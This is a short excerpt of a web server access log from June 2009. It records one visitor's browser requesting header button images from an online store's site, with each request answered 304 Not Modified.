66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
